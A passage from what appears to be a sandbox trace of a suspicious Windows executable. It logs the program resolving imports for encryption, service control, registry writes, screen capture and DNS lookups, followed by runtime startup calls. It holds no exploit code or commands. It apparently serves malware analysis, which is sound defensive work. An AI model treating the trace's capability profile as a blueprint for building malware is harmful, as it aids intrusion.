lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0058.196] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0058.196] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0058.197] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0058.198] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0058.198] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0058.198] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0058.198] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0058.198] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0058.198] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0058.198] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0058.198] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0058.198] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0058.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0058.199] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0058.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0058.199] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0058.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0058.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0058.199] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0058.199] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0058.199] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0058.200] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0058.200] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0058.200] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0058.200] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0058.200] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0058.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0058.200] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0058.200] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0058.200] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0058.200] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0058.201] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0058.201] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0058.201] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0058.201] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0058.201] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0058.201] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0058.201] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0058.201] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0058.201] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0058.201] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0058.202] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0058.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0058.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0058.202] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0058.202] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0058.202] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0058.203] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0058.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0058.203] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0058.203] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0058.203] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0058.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0058.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0058.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0058.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0058.203] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0058.203] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0058.204] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0058.204] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0058.204] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0058.204] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0058.204] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0058.204] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0058.204] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0058.204] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0058.204] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0058.205] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0058.206] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0058.206] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0058.206] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0058.206] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0058.206] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0058.206] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0058.206] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0058.206] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0058.206] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0058.206] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0058.207] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0058.207] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0061.369] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0061.369] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0061.369] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0061.370] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0061.370] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0061.370] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0061.370] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0061.370] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0061.370] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0061.370] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0061.370] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0061.371] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0061.371] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0061.371] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0061.371] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0061.371] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0061.371] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0061.371] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0061.371] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0061.371] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0061.371] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75600000 [0061.988] GetProcAddress (hModule=0x75600000, lpProcName="GetAdaptersInfo") returned 0x75609263 [0061.988] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0062.322] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0062.322] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0062.322] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0062.322] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x755a0000 [0062.629] GetProcAddress (hModule=0x755a0000, lpProcName="DnsFree") returned 0x755a436b [0062.629] GetProcAddress (hModule=0x755a0000, lpProcName="DnsQuery_W") returned 0x755b572c [0062.629] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0062.629] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0062.629] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0062.629] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0062.629] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0062.630] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0062.630] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0062.630] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0062.630] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0062.630] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0062.630] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0062.630] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0062.630] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0062.630] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754e0000 [0063.637] GetProcAddress (hModule=0x754e0000, lpProcName="atexit") returned 0x754fc544 [0063.637] atexit (param_1=0x570920) returned 0 [0063.654] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ebc8 | out: lpSystemTimeAsFileTime=0x18ebc8*(dwLowDateTime=0xcceb1f20, dwHighDateTime=0x1d5ff3b)) [0063.654] GetCurrentThreadId () returned 0x270 [0063.654] GetCurrentProcessId () returned 0xb0 [0063.654] QueryPerformanceCounter (in: lpPerformanceCount=0x18ebc0 | out: lpPerformanceCount=0x18ebc0*=18359568963) returned 1 [0063.756] GetStartupInfoW (in: lpStartupInfo=0x18eb58 | out: lpStartupInfo=0x18eb58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0063.776] GetProcessHeap () returned 0x6f0000 [0063.899] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0063.899] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0063.899] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0063.899] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0063.899] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0063.900] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0063.900] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0063.900] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0063.900] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0063.900] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0063.900] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0063.900] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0063.901] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0063.901] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0063.901] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0063.901] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0063.901] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0063.901] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0063.901] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0063.901] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0063.902] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0063.902] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0063.902] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0063.902] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0063.902] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0063.902] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0063.902] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0063.903] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0063.903] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0063.903] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0063.903] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0063.903] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0063.903] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0063.903] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0063.903] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3bc) returned 0x70f260 [0063.904] GetCurrentThreadId () returned 0x270 [0063.909] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x7007d8 [0063.910] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x800) returned 0x70f628 [0063.910] GetStartupInfoW (in: lpStartupInfo=0x18eb28 | out: lpStartupInfo=0x18eb28*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x8b6e28c0, hStdError=0x58)) [0063.910] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0063.910] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0063.910] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0063.910] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" " [0063.910] GetEnvironmentStringsW () returned 0x70fe30* [0063.947] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xaca) returned 0x710908 [0063.953] FreeEnvironmentStringsW (penv=0x70fe30) returned 1 [0063.959] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe")) returned 0x36 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x76) returned 0x702c78 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x98) returned 0x70fe30 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3e) returned 0x704e18 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x6c) returned 0x70fed0 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x6e) returned 0x70ff48 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x78) returned 0x702cf8 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x62) returned 0x70ffc0 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2e) returned 0x70af58 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x706b10 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x28) returned 0x70a980 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1a) returned 0x70f018 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x4a) returned 0x710030 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x72) returned 0x702d78 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x30) returned 0x70af90 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2e) returned 0x70afc8 [0063.959] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1c) returned 0x70f040 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xd2) returned 0x710088 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x7c) returned 0x710168 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x7101f0 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3a) returned 0x704e60 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x90) returned 0x710230 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70a9b0 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x30) returned 0x70b000 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x7102c8 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x706b60 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x52) returned 0x710308 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3c) returned 0x704ea8 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x82) returned 0x710368 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2e) returned 0x70b038 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x70f068 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2c) returned 0x70b070 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x54) returned 0x7103f8 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x52) returned 0x710458 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x70b0a8 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3c) returned 0x704ef0 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x54) returned 0x7104b8 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70a9e0 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x30) returned 0x70b0e0 [0063.960] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x8c) returned 0x710518 [0063.960] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x710908 | out: hHeap=0x6f0000) returned 1 [0064.010] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x800) returned 0x7105b0 [0064.017] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x80) returned 0x710db8 [0064.068] GetLastError () returned 0x0 [0064.068] SetLastError (dwErrCode=0x0) [0064.068] GetLastError () returned 0x0 [0064.068] SetLastError (dwErrCode=0x0) [0064.068] GetLastError () returned 0x0 [0064.068] SetLastError (dwErrCode=0x0) [0064.068] GetACP () returned 0x4e4 [0064.068] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x220) returned 0x710e40 [0064.068] GetLastError () returned 0x0 [0064.068] SetLastError (dwErrCode=0x0) [0064.068] IsValidCodePage (CodePage=0x4e4) returned 1 [0064.068] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18eb1c | out: lpCPInfo=0x18eb1c) returned 1 [0064.075] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e5e4 | out: lpCPInfo=0x18e5e4) returned 1 [0064.080] GetLastError () returned 0x0 [0064.080] SetLastError (dwErrCode=0x0) [0064.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0064.088] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e9f8, cbMultiByte=256, lpWideCharStr=0x18e368, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0064.088] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18e5f8 | out: lpCharType=0x18e5f8) returned 1 [0064.088] GetLastError () returned 0x0 [0064.088] SetLastError 